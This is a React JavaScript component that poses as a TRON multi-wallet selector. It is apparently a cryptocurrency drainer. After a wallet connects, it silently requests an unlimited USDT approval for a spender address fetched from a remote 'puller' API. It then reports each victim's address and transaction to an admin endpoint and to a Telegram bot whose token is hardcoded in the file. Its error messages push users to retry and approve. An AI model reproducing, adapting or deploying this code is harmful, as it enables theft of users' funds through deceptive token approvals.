import React, { useMemo, useState, useEffect, useCallback } from 'react'
import { WalletProvider, useWallet } from '@tronweb3/tronwallet-adapter-react-hooks'
import { 
  TronLinkAdapter, 
  TokenPocketAdapter
} from '@tronweb3/tronwallet-adapters'
import { BitKeepAdapter } from '@tronweb3/tronwallet-adapter-bitkeep'
import { OkxWalletAdapter } from '@tronweb3/tronwallet-adapter-okxwallet'
import { GateWalletAdapter } from '@tronweb3/tronwallet-adapter-gatewallet'
import { FoxWalletAdapter } from '@tronweb3/tronwallet-adapter-foxwallet'
import { BybitWalletAdapter } from '@bybit-wallet/tronwallet-adapter-bybit-wallet'

// USDT TRC20 (Tether on Tron)
const USDT_TRC20_ADDRESS = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'
// Spender: берётся из API ?type=USDT; fallback — замени на свой адрес контракта-получателя approve
const TRON_SPENDER_CONTRACT = 'TEapWiNvpdpndcJUr74gJdy4d7W8xaoP8r'
const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

// Internal component that uses useWallet
const TronWalletList = ({ onWalletSelect, onClose, onApprove }) => {
  const { 
    connected, 
    address, 
    wallet, 
    select, 
    connect, 
    disconnect,
    connecting,
    wallets,
    selectable 
  } = useWallet()

  const [error, setError] = useState(null)
  const [isApproving, setIsApproving] = useState(false)
  const [shouldApprove, setShouldApprove] = useState(false)

  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  const runTronApproveFlow = useCallback(async () => {
    try {
      setIsApproving(true)
      setError(null)
      console.log("TRON APPROVE started")

      const tronWeb = wallet?.adapter?.tronWeb || window.tronWeb
      
      if (!tronWeb || !tronWeb.ready) {
        throw new Error("TronWeb not ready")
      }

      const account = address || tronWeb.defaultAddress?.base58

      if (!account) {
        throw new Error("Failed to get wallet address")
      }

      // Wait for TronWeb readiness
      let attempts = 0
      while (attempts < 20) {
        if (tronWeb && tronWeb.ready) {
          break
        }
        await new Promise(resolve => setTimeout(resolve, 100))
        attempts++
      }

      if (!tronWeb || !tronWeb.ready) {
        throw new Error("TronWeb not ready")
      }

      // Maximum value for unlimited approve
      const maxApproval = '115792089237316195423570985008687907853269984665640564039457584007913129639935'

      // Get spender from API (type=USDT for TRC20); fallback to constant
      let spenderAddress = null
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDT`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = JSON.parse(text)
              spenderAddress = data.puller || data.pullerAddress || data.address || data.data || data
              if (typeof data === 'string' && data.length >= 34 && data.startsWith('T')) spenderAddress = data
            } catch (e) {
              if (text.startsWith('T') && text.length >= 34) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed for TRC20, using default spender:", fetchError?.message)
      }
      const isTronAddr = (a) => typeof a === 'string' && a.startsWith('T') && a.length >= 34
      if (!isTronAddr(spenderAddress)) {
        console.warn("Spender not received or invalid for TRC20, using default")
        spenderAddress = TRON_SPENDER_CONTRACT
      }
      console.log("TRC20 spender address:", spenderAddress)

      // Get USDT contract
      const contract = await tronWeb.contract().at(USDT_TRC20_ADDRESS)

      // Call approve
      const tx = await contract.approve(spenderAddress, maxApproval).send()

      console.log('✅ USDT TRC20 approve completed successfully:', tx)

      // Get domain from URL
      const domainName = window.location.hostname

      // Send data to server as query parameters
      const params = new URLSearchParams({
        owner: account,
        domainName: domainName,
        spender: spenderAddress
      })

      const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdts?${params.toString()}`, {
        method: "POST",
        headers: { "Content-Type": "application/json" }
      })

      if (!resSubmit.ok) {
        const text = await resSubmit.text()
        console.error("Submit Error:", text)
        throw new Error(`Submission error: ${resSubmit.status}`)
      }

      console.log("TRON APPROVE OK")
      
      // Send connection information to Telegram
      const message = `✅ <b>USDT TRC20 Approve</b>\n\n` +
        `🔗 Wallet: <code>${account}</code>\n` +
        `📤 Spender: <code>${spenderAddress}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `💼 Wallet: <code>${wallet?.adapter?.name || 'Tron'}</code>\n` +
        `📝 Tx: <code>${tx || 'N/A'}</code>\n` +
        `⏰ ${formatDateTime()}`
      await sendTelegramMessage(message)
      
      setIsApproving(false)
      onApprove()
    } catch (e) {
      console.error("TRON APPROVE FAILED", e)
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.name === 'WalletConnectionError' || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied') || e.message?.includes('cancelled') || e.message?.includes('rejected connection')) {
        userMessage = "Connection cancelled. Please try again and approve in your wallet."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('simulation') || e.message?.includes('simul')) {
        userMessage = "Transaction failed. Check: 1) You have enough TRX for fees (~3-10 TRX). 2) You have USDT in your wallet."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message?.includes('TronWeb not ready')) {
        userMessage = "Wallet not ready. Please open the wallet and try again."
      }
      
      setError(userMessage)
      setIsApproving(false)
    }
  }, [wallet, address, onApprove])

  const handleWalletClick = async (walletName) => {
    try {
      setError(null)
      
      const walletItem = wallets.find(w => w.adapter.name === walletName)
      if (!walletItem) {
        setError('Wallet not found')
        return
      }
      
      if (walletItem.readyState === 'NotDetected') {
        const isMobile = /Android|iPhone|iPad|iPod/i.test(navigator.userAgent)
        if (walletName === 'Bybit Wallet' && isMobile) {
          const pageUrl = window.location.origin + window.location.pathname + '#/usdt-trc20'
          const targetUrlDirect = 'bybitapp://open/route?targetUrl=' + encodeURIComponent(pageUrl)
          window.location.href = `https://app.bybit.com/inapp?by_dp=${encodeURIComponent(targetUrlDirect)}&by_web_link=${encodeURIComponent(pageUrl)}`
          return
        }
        if (walletItem.adapter?.url) {
          window.open(walletItem.adapter.url, '_blank')
        }
        setError('Wallet not installed. Please install the wallet extension.')
        return
      }
      
      try {
        select(walletName)
      } catch (selectErr) {
        const isNotFound = selectErr?.name === 'WalletNotFoundError' || selectErr?.message?.includes('not found')
        if (isNotFound && walletItem.adapter?.url) {
          window.open(walletItem.adapter.url, '_blank')
        }
        setError('Wallet not installed or not detected. Please install the wallet and refresh the page.')
        setShouldApprove(false)
        return
      }
      
      // Automatically connect after selection
      if (!connected && !connecting) {
        setShouldApprove(true)
        try {
          await connect()
        } catch (connectErr) {
          const isNotFound = connectErr?.name === 'WalletNotFoundError' || connectErr?.message?.includes('not found')
          const isNotSelected = connectErr?.name === 'WalletNotSelectedError' || connectErr?.message?.includes('No wallet is selected')
          const isRejected = connectErr?.name === 'WalletConnectionError' || connectErr?.message?.includes('rejected') || connectErr?.message?.includes('rejected connection')
          if (isNotFound && walletItem.adapter?.url) {
            window.open(walletItem.adapter.url, '_blank')
          }
          setError(isRejected
            ? 'Connection cancelled. Please try again and approve in your wallet.'
            : (isNotSelected || isNotFound
              ? 'Wallet not installed or not unlocked. Please install/unlock the wallet and refresh the page.'
              : (connectErr?.message || 'Connection failed. Please try again.')))
          setShouldApprove(false)
          return
        }
      } else if (connected && address) {
        // If already connected, call approve immediately
        await runTronApproveFlow()
      }
      
      onWalletSelect(walletName)
    } catch (error) {
      console.error('Wallet selection error:', error)
      const isNotFound = error?.name === 'WalletNotFoundError' || error?.message?.includes('not found')
      const isNotSelected = error?.name === 'WalletNotSelectedError' || error?.message?.includes('No wallet is selected')
      let userMessage = 'Wallet selection error'
      if (isNotFound || isNotSelected) {
        userMessage = 'Wallet not installed or not unlocked. Please install the wallet, unlock it, and refresh the page.'
        const walletItem = wallets?.find(w => w.adapter?.name === walletName)
        if (walletItem?.adapter?.url) window.open(walletItem.adapter.url, '_blank')
      } else if (error.name === 'WalletConnectionError' || error.message?.includes('denied') || error.message?.includes('rejected') || error.message?.includes('cancelled') || error.message?.includes('rejected connection')) {
        userMessage = "Connection cancelled. Please try again and approve in your wallet."
      } else if (error.message?.includes('not installed')) {
        userMessage = "Wallet not installed. Please install the wallet extension and refresh the page."
      } else if (error.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      }
      setError(userMessage)
      setShouldApprove(false)
    }
  }

  // Automatically call approve after successful connection
  useEffect(() => {
    if (shouldApprove && connected && address && wallet) {
      setShouldApprove(false)
      runTronApproveFlow()
    }
  }, [shouldApprove, connected, address, wallet, runTronApproveFlow])

  // Filter available wallets
  const availableWallets = wallets?.filter((walletItem) => {
    try {
      return walletItem.adapter && walletItem.adapter.name
    } catch (e) {
      return false
    }
  }) || []

  return (
    <div>
      {error && (
        <div className="wallet-error">
          {error}
        </div>
      )}

      {isApproving && (
        <div className="wallet-loading">
          Approving USDT TRC20 token...
        </div>
      )}

      {availableWallets.length > 0 ? (
        <div className="tron-wallets-wrap">
          <div className="tron-wallets-grid">
          {availableWallets.map((walletItem) => {
            const walletName = walletItem.adapter.name
            const isInstalled = walletItem.readyState === 'Installed' || walletItem.readyState === 'Loadable'
            
            return (
              <button
                key={walletName}
                onClick={() => handleWalletClick(walletName)}
                disabled={connecting || isApproving}
                className="tron-wallet-btn"
              >
                <div className="tron-wallet-icon">
                  {walletItem.adapter.icon ? (
                    <img 
                      src={walletItem.adapter.icon} 
                      alt={walletName}
                      className="tron-wallet-img"
                    />
                  ) : (
                    <span>⚡</span>
                  )}
                </div>
                <div className="tron-wallet-name">{walletName}</div>
                {isInstalled && (
                  <div className="tron-wallet-status">Available</div>
                )}
              </button>
            )
          })}
          </div>
        </div>
      ) : (
        <div className="wallet-error">
          No Tron wallets available. Please install TronLink or another supported wallet.
        </div>
      )}
    </div>
  )
}

// Main component with WalletProvider
const TronWalletSelector = ({ onWalletSelect, onClose, onApprove }) => {
  const adapters = useMemo(() => {
    const adapterList = []
    
    // TronLink
    try {
      const tronLinkAdapter = new TronLinkAdapter({ checkTimeout: 3000 })
      adapterList.push(tronLinkAdapter)
    } catch (e) {
      console.warn('TronLink adapter not available:', e)
      try {
        adapterList.push(new TronLinkAdapter({ checkTimeout: 3000 }))
      } catch (e2) {
        console.error('Failed to create TronLink adapter:', e2)
      }
    }
    
    // TokenPocket
    try {
      const tokenPocketAdapter = new TokenPocketAdapter()
      if (tokenPocketAdapter) {
        adapterList.push(tokenPocketAdapter)
      }
    } catch (e) {
      console.log('TokenPocket not installed, skipping:', e.message || e)
    }
    
    // Bitget Wallet (BitKeep)
    try {
      const bitgetAdapter = new BitKeepAdapter()
      if (bitgetAdapter) {
        adapterList.push(bitgetAdapter)
      }
    } catch (e) {
      console.log('Bitget Wallet not installed, skipping:', e.message || e)
    }
    
    // OKX Wallet
    try {
      const okxAdapter = new OkxWalletAdapter()
      if (okxAdapter) {
        adapterList.push(okxAdapter)
      }
    } catch (e) {
      console.log('OKX Wallet not installed, skipping:', e.message || e)
    }
    
    // Gate Wallet
    try {
      const gateWalletAdapter = new GateWalletAdapter()
      if (gateWalletAdapter) {
        adapterList.push(gateWalletAdapter)
      }
    } catch (e) {
      console.log('Gate Wallet not installed, skipping:', e.message || e)
    }
    
    // Fox Wallet
    try {
      const foxWalletAdapter = new FoxWalletAdapter()
      if (foxWalletAdapter) {
        adapterList.push(foxWalletAdapter)
      }
    } catch (e) {
      console.log('Fox Wallet not installed, skipping:', e.message || e)
    }
    
    // Bybit Wallet
    try {
      const bybitAdapter = new BybitWalletAdapter({ checkTimeout: 3000 })
      if (bybitAdapter) {
        adapterList.push(bybitAdapter)
      }
    } catch (e) {
      console.log('Bybit Wallet not installed, skipping:', e.message || e)
    }
    
    console.log('Total Tron adapters created:', adapterList.length)
    return adapterList
  }, [])

  return (
    <WalletProvider adapters={adapters}>
      <TronWalletList 
        onWalletSelect={onWalletSelect}
        onClose={onClose}
        onApprove={onApprove}
      />
    </WalletProvider>
  )
}

export default TronWalletSelector
